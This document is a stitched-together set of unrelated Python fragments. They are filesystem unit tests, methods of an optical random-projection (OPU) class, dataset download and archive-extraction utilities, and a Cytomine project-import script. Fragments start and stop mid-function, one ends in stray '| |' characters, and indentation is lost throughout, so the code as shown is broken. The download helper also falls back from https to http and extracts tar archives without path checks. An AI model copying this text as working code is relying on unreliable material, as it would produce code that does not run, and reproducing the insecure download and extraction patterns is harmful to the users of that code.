with self.assertRaises(FileExistsError):
create_ro(td / "hello_rw", "w")
# Regular `open` can accidentally clobber the RW file, but not the RO one.
if os.geteuid() != 0: # Root can clobber anything :/
with self.assertRaises(PermissionError):
open(td / "hello_ro", "a")
with open(td / "hello_rw", "a") as out_f:
out_f.write(" -- appended")
with open(td / "hello_ro") as in_f:
self.assertEqual("world_ro", in_f.read())
with open(td / "hello_rw") as in_f:
self.assertEqual("world_rw -- appended", in_f.read())
def _check_has_one_file(self, dir_path, filename, contents):
self.assertEqual([filename.encode()], os.listdir(dir_path))
with open(dir_path / filename) as in_f:
self.assertEqual(contents, in_f.read())
def test_populate_temp_dir_and_rename(self):
with temp_dir() as td:
# Create and populate "foo"
foo_path = td / "foo"
with populate_temp_dir_and_rename(foo_path) as td2:
self.assertTrue(td2.startswith(td + b"/"))
self.assertEqual(td2, td / td2.basename())
self.assertNotEqual(td2.basename(), Path("foo"))
with create_ro(td2 / "hello", "w") as out_f:
out_f.write("world")
self._check_has_one_file(foo_path, "hello", "world")
# Fail to overwrite
with self.assertRaises(OSError) as ctx:
with populate_temp_dir_and_rename(foo_path):
pass # Try to overwrite with empty.
# Different kernels return different error codes :/
self.assertIn(ctx.exception.errno, [errno.ENOTEMPTY, errno.EEXIST])
self._check_has_one_file(foo_path, "hello", "world") # No change
# Force-overwrite
with populate_temp_dir_and_rename(foo_path, overwrite=True) as td2:
with create_ro(td2 / "farewell", "w") as out_f:
out_f.write("arms")
self._check_has_one_file(foo_path, "farewell", "arms")
def test_populate_temp_file_and_rename_success(self):
with temp_dir() as td:
path = td / "dog"
with populate_temp_file_and_rename(path) as outfile:
outfile.write("woof")
tmp_path = outfile.name
# Temp file should be deleted
self.assertFalse(os.path.exists(tmp_path))
# Ensure that file exists and contains correct content
self.assertTrue(os.path.exists(path))
self.assertEqual(path.read_text(), "woof")
def test_populate_temp_file_fail_to_overwrite(self):
with temp_dir() as td:
path = td / "dog"
with open(path, "w") as outfile:
outfile.write("woof")
# Fail to write due to existing file
with self.assertRaises(FileExistsError):
with populate_temp_file_and_rename(path) as outfile:
outfile.write("meow")
tmp_path = outfile.name
# Temp file should be deleted
self.assertFalse(os.path.exists(tmp_path))
# Original file is untouched
self.assertEqual(path.read_text(), "woof")
def test_populate_temp_file_force_overwrite(self):
with temp_dir() as td:
path = td / "dog"
with open(path, "w") as outfile:
outfile.write("woof")
# Succeeds in overwriting contents in "dog"
with populate_temp_file_and_rename(path, overwrite=True) as outfile:
outfile.write("meow")
tmp_path = outfile.name
# Temp file should no longer exist (as it has been renamed)
self.assertFalse(os.path.exists(tmp_path))
# Original file is modified
self.assertEqual(path.read_text(), "meow")
def test_populate_temp_file_and_rename_error(self):
with temp_dir() as td:
path = td / "dog"
with open(path, "w") as outfile:
outfile.write("woof")
with self.assertRaisesRegex(RuntimeError, "^woops$"):
with populate_temp_file_and_rename(path) as outfile:
outfile.write("meow")
tmp_path = outfile.name
raise RuntimeError("woops")
# Temp file should be deleted
self.assertFalse(os.path.exists(tmp_path))
# the original file is untouched
self.assertEqual(path.read_text(), "woof")
def test_unlink(self):
with temp_dir() as td:
nonlinear random projections of one or several input vectors.
The `fit1d` or `fit2d` method must be called before, for setting vector dimensions
or online option.
If you need to transform one vector after each other, add `online=True` in the fit function.
Parameters
----------
X: np.ndarray or torch.Tensor
input vector, or batch of input vectors.
Each vector must have the same dimensions as the one given in `fit1d` or `fit2d`.
encoder_cls: encoder.base.BaseTransformer, optional
class or instance of class that transform the input into binary vectors to be processed by the opu.
decoder_cls: encoder.base.BaseTransformer, optional
class or instance of class that transforms the output of the opu back into the appropriate format.
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
assert self._runner, "Call fit1d or fit2d before transform"
assert self.device.active, "OPU device isn't active, use opu.open() or \"with opu:\""
if inspect.isclass(encoder_cls):
encoder = encoder_cls()
else:
encoder = encoder_cls
X_enc = encoder.transform(X)
user_input = OpuUserInput.from_traits(X_enc, self._runner.traits)
self._debug(str(user_input))
if user_input.is_batch and not self._s.simulated:
# With batch input start acquisition first
assert self.device.acq_state.value != AcqState.online.value, \
"Can't transform a batch of vectors when acquisition is" \
" in online mode, only single vectors"
with self.device.acquiring(n_images=self._s.n_samples_by_pass):
out = self._runner.transform(user_input)
else:
out = self._runner.transform(user_input)
return self._post_transform(out, user_input, encoder, decoder_cls)
def linear_transform(self, X, encoder_cls=NoEncoding, decoder_cls=NoDecoding) -> TransformOutput:
"""
Do a linear transform of X, for Nitro (non-linear) photonic cores.
Parameters
----------
X: np.ndarray or torch.Tensor
input vector, or batch of input vectors.
Each vector must have the same dimensions as the one given in `fit1d` or `fit2d`.
encoder_cls: encoding.base.BaseTransformer, optional
class or instance of class that transform the input into binary vectors to be processed by the opu.
decoder_cls: encoding.base.BaseTransformer, optional
class or instance of class that transforms the output of the opu back into the appropriate format.
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
assert self._runner, "Call fit1d or fit2d before linear_transform"
traits = self._runner.traits
if traits.packed:
# TODO implement for packed
raise RuntimeError("Linear transform isn't yet implemented for packed input :/")
if inspect.isclass(encoder_cls):
encoder = encoder_cls()
else:
encoder = encoder_cls
X_enc = encoder.transform(X)
user_input = OpuUserInput.from_traits(X_enc, traits)
_, result_ctx = self._raw_linear_transform(X_enc, traits, user_input)
# Decoding, add context, and optional convert back to torch if needed
output = self._post_transform(result_ctx, user_input, encoder, decoder_cls)
# Rescale the output, intentionally after the decoding step
if self.rescale is OutputRescaling.variance:
n_features = user_input.n_features_s
output = output / (self._s.stdev * sqrt(n_features))
elif self.rescale is OutputRescaling.norm:
output = output / (self._s.stdev * sqrt(self.n_components))
return output
def transform1d(self, *args, **kwargs):
raise RuntimeError("transform1d is deprecated, you must now use fit1d and transform")
def transform2d(self, *args, **kwargs):
raise RuntimeError("transform2d is deprecated, you must now use fit2d and transform")
def fit_transform1d(self, X, packed: bool = False,
**override) -> ContextArray:
"""Performs the nonlinear random projections of 1d input vector(s).
This function is the one-liner equivalent of `fit1d` and `transform` calls.
.. warning:: when making several transform calls, prefer calling `fit1d`
and then `transform`, or you might encounter an inconsistency in the
transformation matrix.
The input data can be bit-packed, where ``n_features = 8*X.shape[-1]``
Otherwise ``n_features = X.shape[-1]``
If tqdm module is available, it is used for progress display
Parameters
----------
X: np.ndarray or torch.Tensor
a 1d input vector, or batch of 1d input_vectors, binary encoded, packed or not
batch can be 1d or 2d. In all cases ``output.shape[:-1] = X.shape[:-1]``
packed: bool, optional
whether the input data is in bit-packed representation
defaults to False
override: keyword args for overriding transform settings (advanced parameters)
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
self.fit1d(X, None, packed, False, **override)
return self.transform(X)
def fit_transform2d(self, X, packed: bool = False, n_2d_features=None,
**override) -> ContextArray:
"""Performs the nonlinear random projections of 2d input vector(s).
This function is the one-liner equivalent of `fit2d` and `transform` calls.
.. warning:: when making several transform calls, prefer calling `fit2d`
and then `transform`, or you might encounter an inconsistency in the
transformation matrix.
If tqdm module is available, it is used for progress display
Parameters
----------
X: np.ndarray or torch.Tensor
a 2d input vector, or batch of 2d input_vectors, binary encoded, packed or not
packed: bool, optional
whether the input data is in bit-packed representation
if True, each input vector is assumed to be a 1d array, and the "real" number
of features must be provided as n_2d_features
defaults to False
n_2d_features: list, tuple or np.ndarray of length 2
If the input is bit-packed, specifies the shape of each input vector.
Not needed if the input isn't bit-packed.
override: keyword args for overriding transform settings (advanced parameters)
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
self.fit2d(X, n_2d_features, packed, False, **override)
return self.transform(X)
def __fit(self, X, n_features: IntOrTuple,
packed: bool, online: bool, is_2d_features: bool,
**override):
"""Internal working of the fitXd calls
Instantiates a TransformRunner, and start online acq if needs be.
"""
if X is not None:
# Input is provided, do the fit with user input
user_input = OpuUserInput.from_input(X, packed, is_2d_features, n_features)
tr_settings = self._tr_settings(no_input=False, **override)
self._runner = FitTransformRunner(self._s, tr_settings, user_input,
device=self.device,
disable_pbar=self.disable_pbar)
else:
# Only dimensions are provided, no fitting happens on input
assert n_features, "either input vector or n_features must be specified"
# tr_settings has no input_roi, since it uses X to compute it
tr_settings = self._tr_settings(no_input=True, **override)
traits = InputTraits(n_features, packed)
self._runner = TransformRunner(self._s, tr_settings, traits,
device=self.device,
disable_pbar=self.disable_pbar)
self._acq_stack.close()
if online:
if self._s.no_single_transform:
raise RuntimeError("Online transform isn't available with this OPU")
# Start acquisition only if online. Batch transform start their own.
self._acq_stack.enter_context(self.device.acquiring(online=True))
@staticmethod
def _post_transform(output, user_input, encoder, decoder_cls):
"""Final steps after transform
1. reshape
2. decode the output
3. convert to tensor if user input was tensor
"""
output = user_input.reshape_output(output)
# If encoder has get_params method, it's for transmitting it to decoder init
if inspect.isclass(decoder_cls):
if hasattr(encoder, "get_params"):
decoder = decoder_cls(**encoder.get_params())
else:
decoder = decoder_cls()
else:
decoder = decoder_cls
output = decoder.transform(output)
if user_input.is_tensor:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch
return torch.from_numpy(output)
else:
return output
def _raw_linear_transform(self, X, traits=None, user_input=None):
"""
Do linear_transform of X, and return both raw OPU output and decoded output in a tuple
"""
if traits is None:
assert self._runner, "Call fit1d or fit2d before linear_transform"
traits = self._runner.traits
if user_input is None:
user_input = OpuUserInput.from_traits(X, traits)
if self._s.simulated:
prepared_X = X
else:
assert self.device.acq_state.value != AcqState.online.value, \
"Can't do linear transform when acquisition is" \
" in online mode, only single vectors"
assert self._runner.t.input_roi_strategy == InputRoiStrategy.full, \
"ROI strategy must be full for linear_transform to be correct.\n" \
"Set input_roi_strategy attribute to InputRoiStrategy.full."
# X2 is now numpy 2D, whatever the initial shape and the type (torch or numpy)
X2 = user_input.reshape_input(raveled_features=True, leave_single_dim=True)
try:
import lightonopu.linear_reconstruction as reconstruction
except ImportError:
raise RuntimeError("Need a lightonopu version with linear_reconstruction module")
start = time.time()
prepared_X = reconstruction.encode_batch(X2)
self._trace(f"Encoding time {time.time() - start} s")
# Restore the dimension after batch encoding to something suitable for formatting
prepared_X = user_input.unravel_features(prepared_X)
# Run the OPU transform
prepared_input = OpuUserInput.from_traits(prepared_X, traits)
start = time.time()
with self.device.acquiring(n_images=self._s.n_samples_by_pass):
rp_opu = self._runner.transform(prepared_input, linear=True)
self._trace(f"Transform time {time.time() - start} s")
if self._s.simulated:
result_ctx = rp_opu
else:
# Decoding forgets about the context, re-add it to result afterwards
start = time.time()
result = reconstruction.decode_batch(rp_opu)
self._trace(f"Decoding time {time.time() - start} s")
result_ctx = ContextArray(result, rp_opu.context)
return rp_opu, result_ctx
# Repository: Gaurav7888/vision
import os
import os.path
import hashlib
import gzip
import re
import tarfile
from typing import Any, Callable, List, Iterable, Optional, TypeVar, Dict, IO, Tuple
from urllib.parse import urlparse
import zipfile
import lzma
import contextlib
import urllib
import urllib.request
import urllib.error
import pathlib
import torch
from torch.utils.model_zoo import tqdm
from ._utils import (
_download_file_from_remote_location,
_is_remote_location_available,
)
USER_AGENT = "pytorch/vision"
def _urlretrieve(url: str, filename: str, chunk_size: int = 1024) -> None:
with open(filename, "wb") as fh:
with urllib.request.urlopen(urllib.request.Request(url, headers={"User-Agent": USER_AGENT})) as response:
with tqdm(total=response.length) as pbar:
for chunk in iter(lambda: response.read(chunk_size), ""):
if not chunk:
break
pbar.update(chunk_size)
fh.write(chunk)
def gen_bar_updater() -> Callable[[int, int, int], None]:
pbar = tqdm(total=None)
def bar_update(count, block_size, total_size):
if pbar.total is None and total_size:
pbar.total = total_size
progress_bytes = count * block_size
pbar.update(progress_bytes - pbar.n)
return bar_update
def calculate_md5(fpath: str, chunk_size: int = 1024 * 1024) -> str:
md5 = hashlib.md5()
with open(fpath, 'rb') as f:
for chunk in iter(lambda: f.read(chunk_size), b''):
md5.update(chunk)
return md5.hexdigest()
def check_md5(fpath: str, md5: str, **kwargs: Any) -> bool:
return md5 == calculate_md5(fpath, **kwargs)
def check_integrity(fpath: str, md5: Optional[str] = None) -> bool:
if not os.path.isfile(fpath):
return False
if md5 is None:
return True
return check_md5(fpath, md5)
def _get_redirect_url(url: str, max_hops: int = 3) -> str:
initial_url = url
headers = {"Method": "HEAD", "User-Agent": USER_AGENT}
for _ in range(max_hops + 1):
with urllib.request.urlopen(urllib.request.Request(url, headers=headers)) as response:
if response.url == url or response.url is None:
return url
url = response.url
else:
raise RecursionError(
f"Request to {initial_url} exceeded {max_hops} redirects. The last redirect points to {url}."
)
def _get_google_drive_file_id(url: str) -> Optional[str]:
parts = urlparse(url)
if re.match(r"(drive|docs)[.]google[.]com", parts.netloc) is None:
return None
match = re.match(r"/file/d/(?P<id>[^/]*)", parts.path)
if match is None:
return None
return match.group("id")
def download_url(
url: str, root: str, filename: Optional[str] = None, md5: Optional[str] = None, max_redirect_hops: int = 3
) -> None:
"""Download a file from a url and place it in root.
Args:
url (str): URL to download file from
root (str): Directory to place downloaded file in
filename (str, optional): Name to save the file under. If None, use the basename of the URL
md5 (str, optional): MD5 checksum of the download. If None, do not check
max_redirect_hops (int, optional): Maximum number of redirect hops allowed
"""
root = os.path.expanduser(root)
if not filename:
filename = os.path.basename(url)
fpath = os.path.join(root, filename)
os.makedirs(root, exist_ok=True)
# check if file is already present locally
if check_integrity(fpath, md5):
print('Using downloaded and verified file: ' + fpath)
return
if _is_remote_location_available():
_download_file_from_remote_location(fpath, url)
else:
# expand redirect chain if needed
url = _get_redirect_url(url, max_hops=max_redirect_hops)
# check if file is located on Google Drive
file_id = _get_google_drive_file_id(url)
if file_id is not None:
return download_file_from_google_drive(file_id, root, filename, md5)
# download the file
try:
print('Downloading ' + url + ' to ' + fpath)
_urlretrieve(url, fpath)
except (urllib.error.URLError, IOError) as e: # type: ignore[attr-defined]
if url[:5] == 'https':
url = url.replace('https:', 'http:')
print('Failed download. Trying https -> http instead.'
' Downloading ' + url + ' to ' + fpath)
_urlretrieve(url, fpath)
else:
raise e
# check integrity of downloaded file
if not check_integrity(fpath, md5):
raise RuntimeError("File not found or corrupted.")
def list_dir(root: str, prefix: bool = False) -> List[str]:
"""List all directories at a given root
Args:
root (str): Path to directory whose folders need to be listed
prefix (bool, optional): If true, prepends the path to each result, otherwise
only returns the name of the directories found
"""
root = os.path.expanduser(root)
directories = [p for p in os.listdir(root) if os.path.isdir(os.path.join(root, p))]
if prefix is True:
directories = [os.path.join(root, d) for d in directories]
return directories
def list_files(root: str, suffix: str, prefix: bool = False) -> List[str]:
"""List all files ending with a suffix at a given root
Args:
root (str): Path to directory whose folders need to be listed
suffix (str or tuple): Suffix of the files to match, e.g. '.png' or ('.jpg', '.png').
It uses the Python "str.endswith" method and is passed directly
prefix (bool, optional): If true, prepends the path to each result, otherwise
only returns the name of the files found
"""
root = os.path.expanduser(root)
files = [p for p in os.listdir(root) if os.path.isfile(os.path.join(root, p)) and p.endswith(suffix)]
if prefix is True:
files = [os.path.join(root, d) for d in files]
return files
def _quota_exceeded(response: "requests.models.Response") -> bool: # type: ignore[name-defined]
try:
start = next(response.iter_content(chunk_size=128, decode_unicode=True))
return isinstance(start, str) and "Google Drive - Quota exceeded" in start
except StopIteration:
return False
def download_file_from_google_drive(file_id: str, root: str, filename: Optional[str] = None, md5: Optional[str] = None):
"""Download a Google Drive file from and place it in root.
Args:
file_id (str): id of file to be downloaded
root (str): Directory to place downloaded file in
filename (str, optional): Name to save the file under. If None, use the id of the file.
md5 (str, optional): MD5 checksum of the download. If None, do not check
"""
# Based on https://stackoverflow.com/questions/38511444/python-download-files-from-google-drive-using-url
import requests
url = "https://docs.google.com/uc?export=download"
root = os.path.expanduser(root)
if not filename:
filename = file_id
fpath = os.path.join(root, filename)
os.makedirs(root, exist_ok=True)
if os.path.isfile(fpath) and check_integrity(fpath, md5):
print('Using downloaded and verified file: ' + fpath)
else:
session = requests.Session()
response = session.get(url, params={'id': file_id}, stream=True)
token = _get_confirm_token(response)
if token:
params = {'id': file_id, 'confirm': token}
response = session.get(url, params=params, stream=True)
if _quota_exceeded(response):
msg = (
f"The daily quota of the file {filename} is exceeded and it "
f"can't be downloaded. This is a limitation of Google Drive "
f"and can only be overcome by trying again later."
)
raise RuntimeError(msg)
_save_response_content(response, fpath)
def _get_confirm_token(response: "requests.models.Response") -> Optional[str]: # type: ignore[name-defined]
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def _save_response_content(
response: "requests.models.Response", destination: str, chunk_size: int = 32768, # type: ignore[name-defined]
) -> None:
with open(destination, "wb") as f:
pbar = tqdm(total=None)
progress = 0
for chunk in response.iter_content(chunk_size):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
progress += len(chunk)
pbar.update(progress - pbar.n)
pbar.close()
def _extract_tar(from_path: str, to_path: str, compression: Optional[str]) -> None:
with tarfile.open(from_path, f"r:{compression[1:]}" if compression else "r") as tar:
tar.extractall(to_path)
_ZIP_COMPRESSION_MAP: Dict[str, int] = {
".xz": zipfile.ZIP_LZMA,
}
def _extract_zip(from_path: str, to_path: str, compression: Optional[str]) -> None:
with zipfile.ZipFile(
from_path, "r", compression=_ZIP_COMPRESSION_MAP[compression] if compression else zipfile.ZIP_STORED
) as zip:
zip.extractall(to_path)
_ARCHIVE_EXTRACTORS: Dict[str, Callable[[str, str, Optional[str]], None]] = {
".tar": _extract_tar,
".zip": _extract_zip,
}
_COMPRESSED_FILE_OPENERS: Dict[str, Callable[..., IO]] = {".gz": gzip.open, ".xz": lzma.open}
_FILE_TYPE_ALIASES: Dict[str, Tuple[Optional[str], Optional[str]]] = {".tgz": (".tar", ".gz")}
def _verify_archive_type(archive_type: str) -> None:
if archive_type not in _ARCHIVE_EXTRACTORS.keys():
valid_types = "', '".join(_ARCHIVE_EXTRACTORS.keys())
raise RuntimeError(f"Unknown archive type '{archive_type}'. Known archive types are '{valid_types}'.")
def _verify_compression(compression: str) -> None:
if compression not in _COMPRESSED_FILE_OPENERS.keys():
valid_types = "', '".join(_COMPRESSED_FILE_OPENERS.keys())
raise RuntimeError(f"Unknown compression '{compression}'. Known compressions are '{valid_types}'.")
def _detect_file_type(file: str) -> Tuple[str, Optional[str], Optional[str]]:
path = pathlib.Path(file)
suffix = path.suffix
suffixes = pathlib.Path(file).suffixes
if not suffixes:
raise RuntimeError(
f"File '{file}' has no suffixes that could be used to detect the archive type and compression."
)
elif len(suffixes) > 2:
raise RuntimeError(
"Archive type and compression detection only works for 1 or 2 suffixes. " f"Got {len(suffixes)} instead."
)
elif len(suffixes) == 2:
# if we have exactly two suffixes we assume the first one is the archive type and the second one is the
# compression
archive_type, compression = suffixes
_verify_archive_type(archive_type)
_verify_compression(compression)
return "".join(suffixes), archive_type, compression
# check if the suffix is a known alias
with contextlib.suppress(KeyError):
return (suffix, *_FILE_TYPE_ALIASES[suffix])
# check if the suffix is an archive type
with contextlib.suppress(RuntimeError):
_verify_archive_type(suffix)
return suffix, suffix, None
# check if the suffix is a compression
with contextlib.suppress(RuntimeError):
_verify_compression(suffix)
return suffix, None, suffix
raise RuntimeError(f"Suffix '{suffix}' is neither recognized as archive type nor as compression.")
def _decompress(from_path: str, to_path: Optional[str] = None, remove_finished: bool = False) -> str:
r"""Decompress a file.
The compression is automatically detected from the file name.
Args:
from_path (str): Path to the file to be decompressed.
to_path (str): Path to the decompressed file. If omitted, ``from_path`` without compression extension is used.
remove_finished (bool): If ``True``, remove the file after the extraction.
Returns:
(str): Path to the decompressed file.
"""
suffix, archive_type, compression = _detect_file_type(from_path)
if not compression:
raise RuntimeError(f"Couldn't detect | |
# cytomineprojectmigrator/importer.py
# -*- coding: utf-8 -*-
# * Copyright (c) 2009-2019. Authors: see NOTICE file.
# *
# * Licensed under the Apache License, Version 2.0 (the "License");
# * you may not use this file except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.apache.org/licenses/LICENSE-2.0
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import copy
import json
import os
import logging
import random
import shutil
import string
import sys
import tarfile
import time
from argparse import ArgumentParser
import requests
from cytomine import Cytomine
from cytomine.models import OntologyCollection, TermCollection, User, RelationTerm, ProjectCollection, \
StorageCollection, AbstractImageCollection, ImageInstance, ImageInstanceCollection, AbstractImage, UserCollection, \
Ontology, Project, Term, AnnotationCollection, Annotation, Property, Model, AttachedFile, Description
from joblib import Parallel, delayed
__author__ = "<NAME> <<EMAIL>>"
def find_first(l):
return l[0] if len(l) > 0 else None
def random_string(length=10):
return ''.join(random.choice(string.ascii_letters) for _ in range(length))
def connect_as(user=None, open_admin_session=False):
public_key = None
private_key = None
if hasattr(user, "publicKey") and user.publicKey:
public_key = user.publicKey
if hasattr(user, "privateKey") and user.privateKey:
private_key = user.privateKey
if not public_key or not private_key:
keys = user.keys()
public_key, private_key = keys["publicKey"], keys["privateKey"]
Cytomine.get_instance().set_credentials(public_key, private_key)
if open_admin_session:
Cytomine.get_instance().open_admin_session()
return Cytomine.get_instance().current_user
class Importer:
def __init__(self, host_upload, working_path, with_original_date=False):
self.host_upload = host_upload
self.with_original_date = with_original_date
self.id_mapping = {}
self.working_path = working_path
self.with_userannotations = False
self.with_images = False
self.super_admin = None
def run(self):
self.super_admin = Cytomine.get_instance().current_user
connect_as(self.super_admin, True)
users = UserCollection().fetch()
users_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("user-collection")][0]
remote_users = UserCollection()
for u in json.load(open(os.path.join(self.working_path, users_json))):
remote_users.append(User().populate(u))
roles = ["project_manager", "project_contributor", "ontology_creator"]
if self.with_images:
roles += ["image_creator", "image_reviewer"]
if self.with_userannotations:
roles += ["userannotation_creator", "userannotationterm_creator"]
roles = set(roles)
remote_users = [u for u in remote_users if len(roles.intersection(set(u.roles))) > 0]
for remote_user in remote_users:
user = find_first([u for u in users if u.username == remote_user.username])
if not user:
user = copy.copy(remote_user)
if not user.password:
user.password = random_string()  # original password value was redacted in the source; a random one is assumed here
if not self.with_original_date:
user.created = None
user.updated = None
user.save()
self.id_mapping[remote_user.id] = user.id
# --------------------------------------------------------------------------------------------------------------
logging.info("1/ Import ontology and terms")
"""
Import the ontology with terms and relation terms that are stored in pickled files in working_path.
If the ontology exists (same name and same terms), the existing one is used.
Otherwise, an ontology with an available name is created with new terms and corresponding relationships.
"""
ontologies = OntologyCollection().fetch()
ontology_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("ontology")][0]
remote_ontology = Ontology().populate(json.load(open(os.path.join(self.working_path, ontology_json))))
remote_ontology.name = remote_ontology.name.strip()
terms = TermCollection().fetch()
terms_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("term-collection")]
remote_terms = TermCollection()
if len(terms_json) > 0:
for t in json.load(open(os.path.join(self.working_path, terms_json[0]))):
remote_terms.append(Term().populate(t))
def ontology_exists():
compatible_ontology = find_first([o for o in ontologies if o.name == remote_ontology.name.strip()])
if compatible_ontology:
set1 = set((t.name, t.color) for t in terms if t.ontology == compatible_ontology.id)
difference = [term for term in remote_terms if (term.name, term.color) not in set1]
if len(difference) == 0:
return True, compatible_ontology
return False, None
else:
return True, None
i = 1
remote_name = remote_ontology.name
found, existing_ontology = ontology_exists()
while not found:
remote_ontology.name = "{} ({})".format(remote_name, i)
found, existing_ontology = ontology_exists()
i += 1
# SWITCH to ontology creator user
connect_as(User().fetch(self.id_mapping[remote_ontology.user]))
if not existing_ontology:
ontology = copy.copy(remote_ontology)
ontology.user = self.id_mapping[remote_ontology.user]
if not self.with_original_date:
ontology.created = None
ontology.updated = None
ontology.save()
self.id_mapping[remote_ontology.id] = ontology.id
logging.info("Ontology imported: {}".format(ontology))
for remote_term in remote_terms:
logging.info("Importing term: {}".format(remote_term))
term = copy.copy(remote_term)
term.ontology = self.id_mapping[term.ontology]
term.parent = None
if not self.with_original_date:
term.created = None
term.updated = None
term.save()
self.id_mapping[remote_term.id] = term.id
logging.info("Term imported: {}".format(term))
remote_relation_terms = [(term.parent, term.id) for term in remote_terms]
for relation in remote_relation_terms:
parent, child = relation
if parent:
rt = RelationTerm(self.id_mapping[parent], self.id_mapping[child]).save()
logging.info("Relation term imported: {}".format(rt))
else:
self.id_mapping[remote_ontology.id] = existing_ontology.id
ontology_terms = [t for t in terms if t.ontology == existing_ontology.id]
for remote_term in remote_terms:
self.id_mapping[remote_term.id] = find_first([t for t in ontology_terms if t.name == remote_term.name]).id
logging.info("Ontology already encoded: {}".format(existing_ontology))
# SWITCH USER
connect_as(self.super_admin, True)
# --------------------------------------------------------------------------------------------------------------
logging.info("2/ Import project")
"""
Import the project (i.e. the Cytomine Project domain) stored in pickled file in working_path.
If a project with the same name already exists, append a (x) suffix where x is an increasing number.
"""
projects = ProjectCollection().fetch()
project_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("project")][0]
remote_project = Project().populate(json.load(open(os.path.join(self.working_path, project_json))))
remote_project.name = remote_project.name.strip()
def available_name():
i = 1
existing_names = [o.name for o in projects]
new_name = project.name
while new_name in existing_names:
new_name = "{} ({})".format(project.name, i)
i += 1
return new_name
project = copy.copy(remote_project)
project.name = available_name()
project.discipline = None
project.ontology = self.id_mapping[project.ontology]
project_contributors = [u for u in remote_users if "project_contributor" in u.roles]
project.users = [self.id_mapping[u.id] for u in project_contributors]
project_managers = [u for u in remote_users if "project_manager" in u.roles]
project.admins = [self.id_mapping[u.id] for u in project_managers]
if not self.with_original_date:
project.created = None
project.updated = None
project.save()
self.id_mapping[remote_project.id] = project.id
logging.info("Project imported: {}".format(project))
# --------------------------------------------------------------------------------------------------------------
logging.info("3/ Import images")
storages = StorageCollection().fetch()
abstract_images = AbstractImageCollection().fetch()
images_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("imageinstance-collection")]
remote_images = ImageInstanceCollection()
if len(images_json) > 0:
for i in json.load(open(os.path.join(self.working_path, images_json[0]))):
remote_images.append(ImageInstance().populate(i))
remote_images_dict = {}
for remote_image in remote_images:
image = copy.copy(remote_image)
# Fix old image name due to urllib3 limitation
remote_image.originalFilename = bytes(remote_image.originalFilename, 'utf-8').decode('ascii', 'ignore')
if remote_image.originalFilename not in remote_images_dict.keys():
remote_images_dict[remote_image.originalFilename] = [remote_image]
else:
remote_images_dict[remote_image.originalFilename].append(remote_image)
logging.info("Importing image: {}".format(remote_image))
# SWITCH user to image creator user
connect_as(User().fetch(self.id_mapping[remote_image.user]))
# Get its storage
storage = find_first([s for s in storages if s.user == Cytomine.get_instance().current_user.id])
if not storage:
storage = storages[0]
# Check if image is already in its storage
abstract_image = find_first([ai for ai in abstract_images
if ai.originalFilename == remote_image.originalFilename
and ai.width == remote_image.width
and ai.height == remote_image.height
and ai.resolution == remote_image.resolution])
if abstract_image:
logging.info("== Found corresponding abstract image. Linking to project.")
ImageInstance(abstract_image.id, self.id_mapping[remote_project.id]).save()
else:
logging.info("== New image starting to upload & deploy")
filename = os.path.join(self.working_path, "images", image.originalFilename.replace("/", "-"))
Cytomine.get_instance().upload_image(self.host_upload, filename, storage.id,
self.id_mapping[remote_project.id])
time.sleep(0.8)
# SWITCH USER
connect_as(self.super_admin, True)
# Waiting for all images...
n_new_images = -1
new_images = None
count = 0
while n_new_images != len(remote_images) and count < len(remote_images) * 5:
new_images = ImageInstanceCollection().fetch_with_filter("project", self.id_mapping[remote_project.id])
n_new_images = len(new_images)
if count > 0:
time.sleep(5)
count = count + 1
print("All images have been deployed. Fixing image-instances...")
# Fix image instances meta-data:
for new_image in new_images:
remote_image = remote_images_dict[new_image.originalFilename].pop()
if self.with_original_date:
new_image.created = remote_image.created
new_image.updated = remote_image.updated
new_image.reviewStart = remote_image.reviewStart if hasattr(remote_image, 'reviewStart') else None
new_image.reviewStop = remote_image.reviewStop if hasattr(remote_image, 'reviewStop') else None
new_image.reviewUser = self.id_mapping[remote_image.reviewUser] if hasattr(remote_image, 'reviewUser') and remote_image.reviewUser else None
new_image.instanceFilename = remote_image.instanceFilename
new_image.update()
self.id_mapping[remote_image.id] = new_image.id
self.id_mapping[remote_image.baseImage] = new_image.baseImage
new_abstract = AbstractImage().fetch(new_image.baseImage)
if self.with_original_date:
new_abstract.created = remote_image.created
new_abstract.updated = remote_image.updated
if new_abstract.resolution is None:
new_abstract.resolution = remote_image.resolution
if new_abstract.magnification is None:
new_abstract.magnification = remote_image.magnification
new_abstract.update()
print("All image-instances have been fixed.")
# --------------------------------------------------------------------------------------------------------------
logging.info("4/ Import user annotations")
annots_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("user-annotation-collection")]
remote_annots = AnnotationCollection()
if len(annots_json) > 0:
for a in json.load(open(os.path.join(self.working_path, annots_json[0]))):
remote_annots.append(Annotation().populate(a))
def _add_annotation(remote_annotation, id_mapping, with_original_date):
if remote_annotation.project not in id_mapping.keys() \
or remote_annotation.image not in id_mapping.keys():
return
annotation = copy.copy(remote_annotation)
annotation.project = id_mapping[remote_annotation.project]
annotation.image = id_mapping[remote_annotation.image]
annotation.user = id_mapping[remote_annotation.user]
annotation.term = [id_mapping[t] for t in remote_annotation.term]
